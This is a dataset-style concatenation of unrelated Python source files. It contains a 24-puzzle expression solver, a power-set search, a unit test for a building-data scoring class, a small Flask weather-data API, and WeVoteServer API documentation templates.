def __truediv__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "/")
def __floordiv__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "//")
def __pow__(self, power: Union[Real, ArithmeticExpression], modulo=None) -> ArithmeticExpression:
return ArithmeticExpression(self, power, "**")
def __mod__(self, other: Union[Real, ArithmeticExpression]) -> ArithmeticExpression:
return ArithmeticExpression(self, other, "%")
def __str__(self) -> str:
return "({}{}{})".format(self.operand_lhs, self.operator, self.operand_rhs)
def __repr__(self) -> str:
return self.__str__()
def __hash__(self) -> str:
return hash(self.__str__())
def get_result(self) -> Union[Real, ArithmeticExpression]:
"""
Returns the result of the Arithmetic Expression
:return: a number
"""
if isinstance(self.operand_lhs, ArithmeticExpression):
lhs: Union[Real, ArithmeticExpression] = self.operand_lhs.get_result()
else:
lhs: Real = self.operand_lhs
if isinstance(self.operand_rhs, ArithmeticExpression):
rhs: Union[Real, ArithmeticExpression] = self.operand_rhs.get_result()
else:
rhs: Real = self.operand_rhs
return simplify_expression(lhs, rhs, self.operator)
def __copy__(self) -> Union[Real, ArithmeticExpression]:
"""
Returns a copy of the current expression.
Not used
:return: ArithmeticExpression object
"""
if isinstance(self.operand_lhs, ArithmeticExpression):
lhs: Union[Real, ArithmeticExpression] = self.operand_lhs.__copy__()
else:
lhs = self.operand_lhs
if isinstance(self.operand_rhs, ArithmeticExpression):
rhs: Union[Real, ArithmeticExpression] = self.operand_rhs.__copy__()
else:
rhs = self.operand_rhs
return ArithmeticExpression(lhs, rhs, self.operator)
def get_list_permutation(list_given: list) -> list:
"""
Return a list permutations of from list_given
:param list_given: a list given
:return: list of permutations
"""
return list(permutations(list_given))
def get_list_combination_with_replacement(list_given: Union[list, set], size) -> list:
"""
Return a list combinations with replacement from list_given
:param list_given: a list given
:return: list of combinations with replacement
"""
return list(combinations_with_replacement(list_given, size))
def get_list_list_item_mathematical_permutate_operators(list_permutation_operands, list_permutation_operators):
"""
For every list that is a permutation of operands, interweave every list that is a permutation of operators
within it.
Example:
[1, 2, 3, 4]
[+, -, *]
[+, *, -]
[-, +, *]
[-, *, +]
[*, +, -]
[*, -, +]
[1, 3, 2, 4]
[+, -, *]
[+, *, -]
...
etc...
Result:
[1, +, 2, -, 3, *, 4]
[1, +, 2, *, 3, -, 4]
...
[1, *, 2, -, 3, +, 4]
[1, +, 3, -, 2, *, 4]
[1, +, 3, *, 2, -, 4]
...
[1, *, 3, -, 2, +, 4]
etc...
:param list_permutation_operands: list containing a list of operands
:param list_permutation_operators: list containing a list of operators
:return: List containing list of alternating operands and operators
"""
# List containing lists where the inner lists contain mathematical items (operands and operators)
list_list_item_mathematical = []
# Loop through list_permutation_operands
for permutation_operands in list_permutation_operands:
# print(permutation_operands)
# Loop through list_permutation_operators
for permutation_operators in list_permutation_operators:
# print("\t", permutation_operators)
# Make a list containing mathematical items
list_item_mathematical = []
# Loop through permutation_operands getting the operands and its indices
for index, operand in enumerate(permutation_operands):
# Add operand to list_item_mathematical
list_item_mathematical.append(operand)
# If the index of the operand is the last one
if index == len(permutation_operands) - 1:
# print("\t\t", list_item_mathematical)
# Add a copy of list_item_mathematical into list_list_item_mathematical
list_list_item_mathematical.append(list_item_mathematical.copy())
break
# Add operator to list_item_mathematical
list_item_mathematical.append(permutation_operators[index])
# Return list of list of item mathematical
return list_list_item_mathematical
def simplify_list_item_mathematical(list_item_mathematical: list) -> Real:
"""
Apply mathematical operations on the operands and reduce to 1 value
Not Used
:param list_item_mathematical: list of mathematical items
:return: value
"""
# Current value
value = None
# Current Operator
operator_current = None
# If operator is used already
operator_used = None
# Loop through every item in list_item_mathematical
for item in list_item_mathematical:
# Check if item is a string which should be an operator
if isinstance(item, str):
operator_current = item
operator_used = False
# If not a string then it's a number
else:
# If value is None initially
if value is None:
value = item
# Do math of with the operand and the operator if the current operator is not used
if operator_used is False:
value = simplify_expression(value, item, operator_current)
operator_used = True
# Return value
return value
def dfs_permutations_expression_arithmetic_priority(list_item_mathematical: list,
list_arithmetic_expression: list = None):
"""
Given a list of mathematical items, find all permutations of the order in which each arithmetic expression,
a combination of 2 operands and 1 operator, will be evaluated first. Each arithmetic expression is created via dfs
method.
Notes:
list_item_mathematical MUST NOT BE A GENERATOR
Example:
1 + 2 * 3
Result:
((1 + 2) * 3)
(1 + (2 * 3))
# Doctest function call
>>> dfs_permutations_expression_arithmetic_priority([1, "+", 2, "*", 3])
[((1+2)*3), (1+(2*3))]
:param list_item_mathematical: list of mathematical items
:param list_arithmetic_expression: list of arithmetic expresssions
:return:
"""
# Reset variables for reuse of the function
if list_arithmetic_expression is None:
list_arithmetic_expression = []
# Loop through mathematical items in list_item_mathematical
for index, item in enumerate(list_item_mathematical):
# If item is a string then it's probably an operator
if isinstance(item, str):
# Assume item is an operator
operator = item
# lhs and rhs operands
lhs = list_item_mathematical[index - 1]
rhs = list_item_mathematical[index + 1]
# Create a list similar to list_item_mathematical but also hosts a new object called ArithmeticExpression
list_list_item_mathematical_with_expression_arithmetic = []
# Loop through mathematical items in list_item_mathematical again
for index_2, item_2 in enumerate(list_item_mathematical):
# If index_2 is in [index - 1, index, index + 1]
if index_2 in [index - 1, index, index + 1]:
# If index_2 and index match
if index_2 == index:
"""
Create and add the ArithmeticExpression to
list_list_item_mathematical_with_expression_arithmetic
"""
list_list_item_mathematical_with_expression_arithmetic.append(
ArithmeticExpression(lhs, rhs, operator))
# *Continue only when we pass the three indices where the middle index == index_2
continue
"""
*Add the mathematical item to list_list_item_mathematical_with_expression_arithmetic assuming that
we have have passed or not have not reached the 3 mathematical items that will turn into a mathematical
item.
"""
list_list_item_mathematical_with_expression_arithmetic.append(item_2)
# If the size of list_list_item_mathematical_with_expression_arithmetic is 1
if len(list_list_item_mathematical_with_expression_arithmetic) == 1:
# print((list_list_item_mathematical_with_expression_arithmetic[0]))
"""
Add the first object in list_list_item_mathematical_with_expression_arithmetic to
list_arithmetic_expression
This means that the item is just 1 Arithmetic Expression object
"""
list_arithmetic_expression.append(list_list_item_mathematical_with_expression_arithmetic[0])
# Recursive Call ONLY when there is not 1 item in the list_list_item_mathematical_with_expression_arithmetic
else:
dfs_permutations_expression_arithmetic_priority(list_list_item_mathematical_with_expression_arithmetic,
list_arithmetic_expression)
return list_arithmetic_expression
def simplify_expression(operand_lhs: Real, operand_rhs: Real, operator: str) -> Real:
"""
Given lhs operand, rhs operand, and operator, simplify the expression or solve
WARNING:
Don't use the dict way because it has to check the operands immediately regardless of key being called or not
:param operand_lhs: lhs operand
:param operand_rhs: rhs operand
:param operator: operator
:return: result of the expression
"""
# key = {"+": operand_lhs + operand_rhs,
# "-": operand_lhs - operand_rhs,
# "*": operand_lhs * operand_rhs,
# "/": operand_lhs / operand_rhs
# }
# return key.get(operator)
# Result is currently None
result = None
# Get the result of the operation
try:
if operator == "+":
result = operand_lhs + operand_rhs
elif operator == "-":
result = operand_lhs - operand_rhs
elif operator == "*":
result = operand_lhs * operand_rhs
elif operator == "/":
result = operand_lhs / operand_rhs
elif operator == "//":
result = operand_lhs // operand_rhs
elif operator == "**":
result = operand_lhs ** operand_rhs
elif operator == "%":
result = operand_lhs % operand_rhs
except ZeroDivisionError as e:
# print("Cannot do {} / {} ".format(operand_lhs, operand_rhs))
pass
except OverflowError as e:
# print("Result it too big!")
pass
except TypeError as e:
# print("Mathematical operation can be be done with operands {} and {}".format(operand_lhs, operand_rhs))
pass
except Exception as e:
print(e)
print(traceback.print_exc())
# Return the result
return result
def get_dict_key_result_value_set_arithmetic_expression(
list_operands, list_operators,
treat_list_operators_as_allowed_to_use=False) -> Dict[Real, Set[ArithmeticExpression]]:
"""
Given a list of operands and a list of operators, find all possible permutations of these mathematical items, then
solve.
:param list_operands: list of operands
:param list_operators: list of operators
:param treat_list_operators_as_allowed_to_use: Treat list of operators as operators that the algorithm is allowed
to use rather than what the algorithm should use once (Not at least once).
:return: dictionary of result of the expression and the expression
"""
"""
List of list of operands as permutations
Notes:
Alternatively, permutations can be called instead of get_list_permutation which should be less memory intensive
optimal.
"""
permutations_operands = permutations(list_operands)
# List of list of operators as combinations with replacement
if treat_list_operators_as_allowed_to_use:
"""
Get every combination with replacement of operators within list_operators
Notes:
Alternatively, combinations_with_replacement can be called here instead because the set function below this
variable will make this not exhaustible.
"""
list_list_operators_every_combination = combinations_with_replacement(set(list_operators),
len(list_operands) - 1)
"""
*** Get every permutation of of every combination from list_list_operators_every_combination into 1 chain object
of type iterable, then remove duplicate permutations by putting them into a set.
"""
list_list_operators = set(chain(*[permutations(i) for i in list_list_operators_every_combination]))
# print(set(list_list_operators))
# List of list of operators as permutations
else:
# list_list_operators needs to be not exhaustible because it will be reused over again
list_list_operators = get_list_permutation(list_operators)
# Get list of list of mathematical items
list_list_item_mathematical = get_list_list_item_mathematical_permutate_operators(permutations_operands,
list_list_operators)
# Default dict of Key result of expression amd Value set that contains Arithmetic Expression
dict_result_arithmetic_expression = defaultdict(set)
# For list of mathematical items
for list_item_mathematical in list_list_item_mathematical:
# Get a list Arithmetic Expressions which are objects represent a list_item_mathematical
list_arithmetic_expression = dfs_permutations_expression_arithmetic_priority(list_item_mathematical)
# For every Arithmetic Expression
for arithmetic_expression in list_arithmetic_expression:
# print(f"Arithmetic Expression: {arithmetic_expression}")
# print(f"Arithmetic Expression Result: {arithmetic_expression.get_return()}")
# Add result of Arithmetic Expression as a Key and the Arithmetic Expression its set
dict_result_arithmetic_expression[arithmetic_expression.get_result()].add(arithmetic_expression)
# Return dict_result_arithmetic_expression
return dict_result_arithmetic_expression
def solve_problem(target=24):
"""
Solve the problem posed in the video "Can you solve this puzzle. Make 24 from 6 4 3 and 1."
(https://www.youtube.com/watch?v=Jnf18uqZRyw)
:param target: Value to reach
:return: None
"""
operands = [6, 4, 3, 1]
operators = ["+", "-", "*", "/"]
dict_results = get_dict_key_result_value_set_arithmetic_expression(operands, operators,
treat_list_operators_as_allowed_to_use=True)
set_solution = dict_results.get(target, None)
print(f"Target is {target}")
if set_solution is None:
print("Target could not be found!")
print("Solution does not exist")
else:
print("Possible solutions are:")
for expression in set_solution:
print("\t{} = {}".format(expression, expression.get_result()))
print("\n" + 100 * "-" + "\n")
print("All Permutations of Operands, Operators, and Order of Operations:")
for key, value in dict_results.items():
print(key)
for expression in value:
print("\t{}".format(expression))
print()
def test_example():
"""
Possibly show all Arithmetic Expressions and their corresponding result
:return: None
"""
operands = [6, 4, 3, 1]
operators = ["+", "-", "*", "/", "**", "//", "%"]
dict_results = get_dict_key_result_value_set_arithmetic_expression(operands, operators,
treat_list_operators_as_allowed_to_use=True)
total_expressions = 0
for key, value in dict_results.items():
print(key)
for expression in value:
total_expressions += 1
print("\t{}".format(expression))
print()
print(f"Total solutions: {len(dict_results)}")
print(f"Total expressions: {total_expressions}")
if __name__ == '__main__':
solve_problem()
print("\n" + 100 * "-" + "\n")
test_example()
```
#### File: search/depth_first_search/depth_first_search_power_set.py
```python
from typing import Set, FrozenSet, List
# from joseph_resources.decorators._old.callable_called_count import print_callable_called_count, callable_called_count
# from joseph_resources.decorators.timer import timer
# @timer
def get_power_set(list_given: list) -> List[set]:
"""
Given a list, find the power set of it which is basically all the combinations for all
sizes from 0 to length of list_given
:param list_given: list given
:return: list of a list of solutions
"""
# Set containing frozensets which are solutions
set_frozenset_shared_solutions = set() # type: Set[FrozenSet]
# A Temp list that can potentially be a solution
list_temp_shared_generic_solution = [] # type: list
# Recursive DFS call
_get_power_set_helper(list_temp_shared_generic_solution, list_given, set_frozenset_shared_solutions)
# Convert frozen set with a tuple
list_sets = [set(i) for i in set_frozenset_shared_solutions]
# Add the empty set
list_sets.append(set())
# Sort the list
list_sets.sort()
return list_sets
# @callable_called_count
def _get_power_set_helper(list_temp_shared_generic_solution: list,
list_remaining_items: list,
set_frozenset_shared_solutions: set) -> None:
"""
Recursive DFS to get all permutations of a List, but making them unique via frozenset which is a combination
Notes: The amount of iterations should be - 1 because empty set is not involved
Total iterations (Permutation formula):
Less than (Due to not Recursive calling for an empty list_remaining_items)
Summation from r = 0 to n of (n!)/((n-r)!)
where r = sample size == len(list_remaining_items)
n = number of objects == len(list_remaining_items)
(n!)/((n-r)!) = permutation formula
Power Set iterations:
Greater than
Summation from r = 0 to n of (n!)/(r!(n-r)!) ==
2^(len(list_remaining_items))
where r = sample size == len(list_remaining_items)
n = number of objects == len(list_remaining_items)
(n!)/(r!(n-r)!) = combination formula
:param list_temp_shared_generic_solution: Temporary List of the current permutation (temp List is shared)
:param list_remaining_items: List of remaining items that need to be added to list_temp_shared_generic_solution
:param set_frozenset_shared_solutions: Set of a frozensets that are to solutions
:return: None
"""
# Loop through the length of list_remaining_items
for i in range(len(list_remaining_items)):
# Add the indexed item into the temp List
list_temp_shared_generic_solution.append(list_remaining_items[i])
# Create a copy of list_remaining_items
list_remaining_items_new = list_remaining_items.copy()
# Pop off the item with the index number
list_remaining_items_new.pop(i)
# Add a frozenset (immutable) which is hashable in a set (mutable)
set_frozenset_shared_solutions.add(frozenset(list_temp_shared_generic_solution))
# Don't recursive call if list_remaining_items_new is empty because you loop for no reason with a range(0)
if list_remaining_items_new:
# Recursive call into this function
_get_power_set_helper(list_temp_shared_generic_solution,
list_remaining_items_new,
set_frozenset_shared_solutions)
# Pop from list_temp_permutation for a new permutation
list_temp_shared_generic_solution.pop()
def test_example():
solution = get_power_set([1, 2, 3, 4, 5])
for i in solution: print(i)
print(len(solution))
# print_callable_called_count()
"""
Callable: get_power_set
Callable ran in 0.001001119613647461 Sec
set()
{1, 3, 5}
{1, 4}
{2}
{3}
{2, 3}
{4}
{3, 4}
{2, 4}
{2, 3, 4}
{4, 5}
{1}
{5}
{3, 5}
{2, 3, 5}
{3, 4, 5}
{1, 3}
{1, 2, 3}
{1, 3, 4}
{1, 5}
{1, 4, 5}
{1, 2}
{2, 5}
{2, 4, 5}
{1, 2, 4, 5}
{2, 3, 4, 5}
{1, 2, 5}
{1, 2, 4}
{1, 2, 3, 4}
{1, 3, 4, 5}
{1, 2, 3, 5}
{1, 2, 3, 4, 5}
32
Callable: _get_power_set_helper
Callable Call Count: 206
"""
if __name__ == '__main__':
test_example()
``` |
{
"source": "josephedwardchang/digitalbuildings",
"score": 2
} |
#### File: tests/dimensions/dimension_test.py
```python
from absl.testing import absltest
from validate import handler as validator
from validate.generate_universe import BuildUniverse
from validate.entity_instance import EntityInstance
from score.dimensions.dimension import Dimension
import copy
def canonical_entity() -> EntityInstance:
entity = list(
validator.Deserialize(['tests/samples/canonical_entity.yaml'
])[0].values())[0]
# Append the type to be checked by is_entity_canonical()
entity.type = BuildUniverse(use_simplified_universe=True).GetEntityType(
entity.namespace, entity.type_name)
return entity
def noncanonical_entity() -> EntityInstance:
entity = list(
validator.Deserialize(['tests/samples/noncanonical_entity.yaml'
])[0].values())[0]
# Append the type to be checked by is_entity_canonical()
entity.type = BuildUniverse(use_simplified_universe=True).GetEntityType(
entity.namespace, entity.type_name)
return entity
class DimensionTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.dimension = Dimension(translations='translations')
self.dimension.correct_virtual = 1
self.dimension.correct_reporting = 1
self.dimension.correct_ceiling_virtual = 2
self.dimension.correct_ceiling_reporting = 2
self.dimension.incorrect_virtual = 1
self.dimension.incorrect_reporting = 1
self.dimension_none = Dimension(deserialized_files='deserialized files')
self.dimension_none.correct_virtual = 0
self.dimension_none.correct_reporting = 0
self.dimension_none.correct_ceiling_virtual = 0
self.dimension_none.correct_ceiling_reporting = 0
self.dimension_none.incorrect_virtual = 0
self.dimension_none.incorrect_reporting = 0
self.dimension_override = copy.copy(self.dimension)
self.entities = {
'canonical_type_appended':
canonical_entity(),
'noncanonical_type_appended':
noncanonical_entity(),
'reporting':
list(
validator.Deserialize(['tests/samples/reporting_entity.yaml'
])[0].values())[0],
'virtual':
list(
validator.Deserialize(['tests/samples/virtual_entity.yaml'
])[0].values())[0],
}
def testArgumentAttributes(self):
self.assertEqual(self.dimension.translations, 'translations')
self.assertEqual(self.dimension.deserialized_files, None)
self.assertEqual(self.dimension_none.translations, None)
self.assertEqual(self.dimension_none.deserialized_files,
'deserialized files')
def testCategoryAttribute_None(self):
self.assertEqual(Dimension.category, None)
self.assertEqual(self.dimension.category, None)
def testArgumentExclusivity(self):
with self.assertRaises(Exception) as not_enough:
Dimension()
self.assertEqual(
not_enough.exception.args[0],
'`translations` xor `deserialized_files` argument is required')
with self.assertRaises(Exception) as too_many:
Dimension(translations='translations',
deserialized_files='deserialized files')
self.assertEqual(
too_many.exception.args[0],
'`translations` or `deserialized_files` argument must be exclusive')
def testCorrectTotal(self):
self.assertEqual(self.dimension.correct_total(), 2)
self.assertEqual(self.dimension_none.correct_total(), 0)
self.assertEqual(self.dimension.correct_total_override, None)
self.dimension.correct_total_override = 4
self.assertEqual(self.dimension.correct_total_override, 4)
def testCorrectCeiling(self):
self.assertEqual(self.dimension.correct_ceiling(), 4)
self.assertEqual(self.dimension_none.correct_total(), 0)
self.assertEqual(self.dimension_override.correct_ceiling_override, None)
self.dimension_override.correct_ceiling_override = 8
self.assertEqual(self.dimension_override.correct_ceiling_override, 8)
def testIncorrectTotal(self):
self.assertEqual(self.dimension.incorrect_total(), 2)
self.assertEqual(self.dimension_none.correct_total(), 0)
self.assertEqual(self.dimension_override.incorrect_total_override, None)
self.dimension_override.incorrect_total_override = 4
self.assertEqual(self.dimension_override.incorrect_total_override, 4)
def testResultComposite(self):
self.assertEqual(self.dimension.result_all, 0.0)
self.assertEqual(self.dimension_none.result_all, None)
self.assertEqual(self.dimension_override.result_all, 0.0)
def testResultVirtual(self):
self.assertEqual(self.dimension.result_virtual, 0.0)
self.assertEqual(self.dimension_none.result_virtual, None)
def testResultReporting(self):
self.assertEqual(self.dimension.result_reporting, 0.0)
self.assertEqual(self.dimension_none.result_reporting, None)
def testEntityIsCanonical(self):
self.assertTrue(
Dimension.is_entity_canonical(self.entities['canonical_type_appended']))
self.assertFalse(
Dimension.is_entity_canonical(
self.entities['noncanonical_type_appended']))
# This entity has had a type of `None` appended, thus it returns false.
reporting_type_none = copy.copy(self.entities['reporting'])
reporting_type_none.type = None
self.assertFalse(Dimension.is_entity_canonical(reporting_type_none))
def testEntityIsReporting(self):
self.assertTrue(Dimension.is_entity_reporting(self.entities['reporting']))
self.assertFalse(Dimension.is_entity_reporting(self.entities['virtual']))
def testEntityIsVirtual(self):
self.assertTrue(Dimension.is_entity_virtual(self.entities['virtual']))
self.assertFalse(Dimension.is_entity_virtual(self.entities['reporting']))
def testStr(self):
self.assertEqual(
str(self.dimension),
'{result_all: 0.00, result_virtual: 0.00, result_reporting: 0.00}')
if __name__ == '__main__':
absltest.main()
``` |
{
"source": "josephedward/surf_sqlalchemy_flask",
"score": 3
} |
#### File: josephedward/surf_sqlalchemy_flask/app.py
```python
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
m_table_ref = Base.classes.measurement
s_table_ref = Base.classes.station
app = Flask(__name__)
@app.route("/")
def home():
print("List all available api routes")
return (f"Available Routes:<br/><br/>"
# f"Precipitation Data for Aug 2016 - Aug 2017: <br/>"
f'All Precipitation Data: <br/><br/>'
f"/precipitation_2016_2017<br/><br/>"
f"List of Stations: <br/><br/>"
f"/station_list<br/><br/>"
f"List of Temperatures at Waihee for Aug 2016 - Aug 2017: <br/><br/>"
f"/temperatures_waihee<br/><br/>"
f"Min, Max, and Avg Temperatures from date yyyy-mm-dd:<br/><br/>"
f"/temp_dates/'your_date'<br/><br/>"
f"Min, Max, and Avg Temperatures from start to end date: yyyy-mm-dd/yyyy-mm-dd<br/><br/>"
f"/temp_dates/'start_date'/'end_date'<br/><br/>"
)
@app.route("/precipitation_2016_2017")
def precipitation():
session = Session(engine)
last_yr_prcp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.prcp).\
# filter(m_table_ref.date <= '2017-08-23').\
# filter(m_table_ref.date > '2016-08-23').\
order_by(m_table_ref.date).all())
return last_yr_prcp_df.to_json()
@app.route("/station_list")
def stations():
session = Session(engine)
station_list_df = pd.DataFrame(session.query(s_table_ref.station,s_table_ref.name ).\
group_by(s_table_ref.station).\
order_by(s_table_ref.station).all())
station_list = list(station_list_df['name'])
return jsonify(station_list)
@app.route("/temperatures_waihee")
def temperatures():
session = Session(engine)
waihee_temp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.tobs).\
filter(m_table_ref.station == 'USC00519281').\
filter(m_table_ref.date >= '2017-01-01').\
filter(m_table_ref.date <= '2017-12-31').\
group_by(m_table_ref.date).all())
return waihee_temp_df.to_json()
@app.route("/temp_dates/<your_date>")
def start_date(your_date):
session = Session(engine)
temp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.tobs).\
filter(m_table_ref.date >= your_date).all())
temp_funcs_df=pd.DataFrame({'Min: ':temp_df['tobs'].min(), 'Max: ':temp_df['tobs'].max(), 'Avg: ':temp_df['tobs'].mean()}, index=["Temp: "])
return temp_funcs_df.to_json()
@app.route("/temp_dates/<start_date>/<end_date>")
def start_end_date(start_date, end_date):
session = Session(engine)
temp_df = pd.DataFrame(session.query(m_table_ref.date, m_table_ref.tobs).\
filter(m_table_ref.date >= start_date).\
filter(m_table_ref.date <= end_date).all())
temp_funcs_df=pd.DataFrame({'Min: ':temp_df['tobs'].min(), 'Max: ':temp_df['tobs'].max(), 'Avg: ':temp_df['tobs'].mean()}, index=["Temp: "])
return temp_funcs_df.to_json()
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "josephevans/WeVoteServer",
"score": 2
} |
#### File: apis_v1/documentation_source/ballot_items_sync_out_doc.py
```python
def ballot_items_sync_out_doc_template_values(url_root):
"""
Show documentation about ballotItemsSyncOut
"""
required_query_parameter_list = [
{
'name': 'format',
'value': 'string', # boolean, integer, long, string
'description': 'Currently must be \'json\' to work.',
},
]
optional_query_parameter_list = [
{
'name': 'google_civic_election_id',
'value': 'integer', # boolean, integer, long, string
'description': 'Limit the ballot_items retrieved to those for this google_civic_election_id.',
},
]
potential_status_codes_list = [
]
try_now_link_variables_dict = {
'format': 'json',
}
api_response = '[{\n' \
' "we_vote_id": string,\n' \
' "ballot_item_display_name": string,\n' \
' "contest_office_we_vote_id": string,\n' \
' "contest_measure_we_vote_id": string,\n' \
' "google_ballot_placement": string,\n' \
' "google_civic_election_id": string,\n' \
' "local_ballot_order": string,\n' \
' "measure_subtitle": string,\n' \
' "polling_location_we_vote_id": string,\n' \
'}]'
template_values = {
'api_name': 'ballotItemsSyncOut',
'api_slug': 'ballotItemsSyncOut/?format=json',
'api_introduction':
"",
'try_now_link': 'apis_v1:ballotItemsSyncOutView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: apis_v1/documentation_source/organization_search_doc.py
```python
def organization_search_doc_template_values(url_root):
"""
Show documentation about organizationSearch
"""
required_query_parameter_list = [
{
'name': 'voter_device_id',
'value': 'string', # boolean, integer, long, string
'description': 'An 88 character unique identifier linked to a voter record on the server',
},
{
'name': 'api_key',
'value': 'string (from post, cookie, or get (in that order))', # boolean, integer, long, string
'description': 'The unique key provided to any organization using the WeVoteServer APIs',
},
]
optional_query_parameter_list = [
{
'name': 'organization_name',
'value': 'string', # boolean, integer, long, string
'description': 'Name of the organization that is displayed.',
},
{
'name': 'organization_email',
'value': 'string', # boolean, integer, long, string
'description': 'Contact email of the organization.',
},
{
'name': 'organization_website',
'value': 'string', # boolean, integer, long, string
'description': 'Website of the organization.',
},
{
'name': 'organization_twitter_handle',
'value': 'string', # boolean, integer, long, string
'description': 'Twitter handle of the organization.',
},
]
potential_status_codes_list = [
{
'code': 'VALID_VOTER_DEVICE_ID_MISSING',
'description': 'Cannot proceed. A valid voter_device_id parameter was not included.',
},
{
'code': 'VALID_VOTER_ID_MISSING',
'description': 'Cannot proceed. A valid voter_id was not found.',
},
{
'code': 'ORGANIZATION_SEARCH_ALL_TERMS_MISSING',
'description': 'Cannot proceed. No search terms were provided.',
},
{
'code': 'ORGANIZATIONS_RETRIEVED',
'description': 'Successfully returned a list of organizations that match search query.',
},
{
'code': 'NO_ORGANIZATIONS_RETRIEVED',
'description': 'Successfully searched, but no organizations found that match search query.',
},
]
try_now_link_variables_dict = {
# 'organization_we_vote_id': 'wv85org1',
}
api_response = '{\n' \
' "status": string,\n' \
' "success": boolean,\n' \
' "voter_device_id": string (88 characters long),\n' \
' "organization_email": string (the original search term passed in),\n' \
' "organization_name": string (the original search term passed in),\n' \
' "organization_twitter_handle": string (the original search term passed in),\n' \
' "organization_website": string (the original search term passed in),\n' \
' "organizations_list": list\n' \
' [\n' \
' "organization_id": integer,\n' \
' "organization_we_vote_id": string,\n' \
' "organization_name": string,\n' \
' "organization_twitter_handle": string,\n' \
' "organization_facebook": string,\n' \
' "organization_email": string,\n' \
' "organization_website": string,\n' \
' ],\n' \
'}'
template_values = {
'api_name': 'organizationSearch',
'api_slug': 'organizationSearch',
'api_introduction':
"Find a list of all organizations that match any of the search terms.",
'try_now_link': 'apis_v1:organizationSearchView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: apis_v1/documentation_source/twitter_sign_in_request_voter_info_doc.py
```python
def twitter_sign_in_request_voter_info_doc_template_values(url_root):
"""
Show documentation about twitterSignInRequestVoterInfo
"""
required_query_parameter_list = [
{
'name': 'voter_device_id',
'value': 'string', # boolean, integer, long, string
'description': 'An 88 character unique identifier linked to a voter record on the server',
},
{
'name': 'return_url',
'value': 'string', # boolean, integer, long, string
'description': 'The URL where the browser should be redirected once authenticated. '
'Usually https://wevote.me/more/sign_in',
},
{
'name': 'api_key',
'value': 'string (from post, cookie, or get (in that order))', # boolean, integer, long, string
'description': 'The unique key provided to any organization using the WeVoteServer APIs',
},
]
optional_query_parameter_list = [
{
'name': 'switch_accounts_if_needed',
'value': 'boolean', # boolean, integer, long, string
'description': 'If a We Vote account already exists for this Twitter handle, create new session tied to'
' that account. If this variable not passed in, defaults to true.',
},
]
potential_status_codes_list = [
{
'code': 'VALID_VOTER_DEVICE_ID_MISSING',
'description': 'Cannot proceed. A valid voter_device_id parameter was not included.',
},
{
'code': 'VALID_VOTER_ID_MISSING',
'description': 'Cannot proceed. A valid voter_id was not found.',
},
]
try_now_link_variables_dict = {
}
api_response = '{\n' \
' "status": string,\n' \
' "success": boolean,\n' \
' "voter_device_id": string (88 characters long),\n' \
' "twitter_handle": string,\n' \
' "twitter_handle_found": boolean,\n' \
' "voter_info_retrieved": boolean,\n' \
' "switch_accounts": boolean,\n' \
' "return_url": string, (This is the final url to return to once authentication is complete. ' \
'If set, the twitterSignInRequestAccessToken api redirects to the twitterSignInRequestVoterInfo ' \
'api before redirecting to the value in return_url)\n' \
'}'
template_values = {
'api_name': 'twitterSignInRequestVoterInfo',
'api_slug': 'twitterSignInRequestVoterInfo',
'api_introduction':
"Flow chart showing entire process here: "
"https://docs.google.com/drawings/d/1WdVFsPZl3aLM9wxGuPTW3veqP-5EmZKv36KWjTz5pbU/edit",
'try_now_link': 'apis_v1:twitterSignInRequestVoterInfoView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: apis_v1/documentation_source/voter_address_save_doc.py
```python
def voter_address_save_doc_template_values(url_root):
"""
Show documentation about voterAddressSave
"""
required_query_parameter_list = [
{
'name': 'api_key',
'value': 'string (from post, cookie, or get (in that order))', # boolean, integer, long, string
'description': 'The unique key provided to any organization using the WeVoteServer APIs',
},
{
'name': 'voter_device_id',
'value': 'string', # boolean, integer, long, string
'description': 'An 88 character unique identifier linked to a voter record on the server',
},
{
'name': 'text_for_map_search',
'value': 'string', # boolean, integer, long, string
'description': 'The address text a voter enters to identify the location tied to their ballot. '
'(Not mailing address.)',
},
]
optional_query_parameter_list = [
# {
# 'name': '',
# 'value': '', # boolean, integer, long, string
# 'description': '',
# },
]
potential_status_codes_list = [
{
'code': 'VALID_VOTER_DEVICE_ID_MISSING',
'description': 'Cannot proceed. A valid voter_device_id parameter was not included.',
},
{
'code': 'MISSING_VOTER_ID_OR_ADDRESS_TYPE',
'description': 'Cannot proceed. Missing variables voter_id or address_type while trying to save.',
},
{
'code': 'VOTER_ADDRESS_SAVED',
'description': 'Successfully saved',
},
{
'code': 'MULTIPLE_MATCHING_ADDRESSES_FOUND',
'description': 'Could not save. Multiple entries already saved.',
},
{
'code': 'MISSING_POST_VARIABLE-ADDRESS',
'description': 'Could not save. POST variable \'address\' is required.',
},
]
try_now_link_variables_dict = {
# 'organization_we_vote_id': 'wv85org1',
}
api_response = '{\n' \
' "status": string,\n' \
' "success": boolean,\n' \
' "voter_device_id": string (88 characters long),\n' \
' "google_civic_election_id": integer,\n' \
' "text_for_map_search": string,\n' \
' "substituted_address_nearby": string,\n' \
' "ballot_found": boolean,\n' \
